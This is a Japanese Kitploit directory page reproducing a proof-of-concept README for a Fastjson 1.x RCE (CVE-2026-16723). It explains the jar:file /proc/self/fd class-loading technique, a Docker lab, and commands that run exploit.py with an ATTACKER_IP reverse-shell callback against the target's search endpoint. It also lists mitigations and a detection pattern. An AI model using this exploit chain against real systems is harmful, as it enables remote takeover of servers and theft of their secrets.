Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-16723 — CVE-2026-16723(Fastjson 1.x の @JSONType リモートコード実行脆弱性)の概念実証エクスプロイト。ペイロード JAR ビルダーとリバースシェルリスナーを備える。 | Kitploit
ツール/GitHubGitHub/yym8538/cve-2026-16723
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングリモートアクセスツール
GitHubyym8538/cve-2026-16723

CVE-2026-16723

CVE-2026-16723(Fastjson 1.x の @JSONType リモートコード実行脆弱性)の概念実証エクスプロイト。ペイロード JAR ビルダーとリバースシェルリスナーを備える。

リポジトリを見る
11ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-16723 Fastjson RCE

★ CVE-2026-16723 Fastjson @JSONType RCE PoC ★


概要

CVE-2026-16723 は Fastjson 1.x (1.2.68 – 1.2.83) における リモートコード実行 (RCE) 脆弱性です。 Fastjson が攻撃者制御の JSON をパースする際、細工された @type 値が checkAutoType 内でのクラスリソース検索に変換されます。Spring Boot の実行可能 fat-JAR では、クラスローダーがその名前を jar:http:// URL として解決し、リモート JAR を取得し (SSRF)、AutoType が無効であっても @JSONType アノテーションを持つクラスをロードします。 現代の JDK / Tomcat は jar:http:// バイナリ名を拒否するため、信頼性の高い亜種では JAR を JVM キャッシュにシードし、jar:file:/proc/self/fd/N 経由で再読み込みすることで、クラスが定義されその静的初期化子が実行され、コード実行が可能になります。 AutoType は無効のままで、クラスパスガジェットも不要です。


影響を受けるバージョン

カテゴリバージョン
脆弱Fastjson 1.2.68 ≤ version ≤ 1.2.83
修正済みFastjson 2.x へ移行 (1.x の修正リリースはなし)

影響

  • サービスアカウントとしてのリモートコード実行
  • ホストおよび環境からのシークレット / 認証情報の漏洩
  • 影響を受けるアプリケーションの完全な侵害

環境

ラボのターゲットは公開ストアフロント (Northwind Store) で、その検索 API は リクエストボディを Fastjson でバインドします。すべて Fastjson の標準デフォルトです: SafeMode オフ、AutoType オフ、Spring Boot fat-JAR としてパッケージ化。

docker build -t cve-2026-16723 .
docker run -d --name cve-2026-16723 -p 8080:8080 cve-2026-16723
前提条件このラボでの状態
Fastjson 1.2.68 – 1.2.831.2.83
Spring Boot 実行可能 fat-JARはい
未認証の JSON パース経路POST /api/products/search
SafeMode / AutoTypeデフォルト (両方オフ)

PoC

攻撃者とターゲットは同じ Docker ブリッジネットワーク上で動作するため、ターゲットは 攻撃者にアウトバウンド接続として到達します (追加ポートの公開は不要)。

ステップ 1. ターゲットが起動していることを確認

curl http://TARGET_IP:8080/api/health
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' -d '{"keyword":"keyboard"}'

ステップ 2. 攻撃者マシンでエクスプロイトを実行

exploit.py はペイロード JAR をビルドし、それを配信し、リスナーを起動し、 リクエストボディを出力します。必要なのはコールバックアドレスのみです。

python3 attacker/exploit.py --lhost ATTACKER_IP --lport 4444

ステップ 3. ペイロードを送信

出力されたボディを検索エンドポイントに貼り付け (Burp Repeater または curl)、 送信します。検索リクエストは通常の機能であり、その JSON ボディのみが細工されています。

curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' --data-binary @body.json

ステップ 4. 結果を確認

コードはサービスアカウントとして実行されます。取得したシェルを通じてフラグを取得します:

whoami

緩和策

  • Fastjson 2.x へ移行する
  • または com.alibaba:fastjson:1.2.83_noneautotype を実行する
  • または JVM を -Dfastjson.parser.safeMode=true で起動する
  • 検出: jar:http または jar:file / /proc/self/fd パターンを含む JSON @type 値

分析

  • KR:
  • EN:
ツールをダウンロード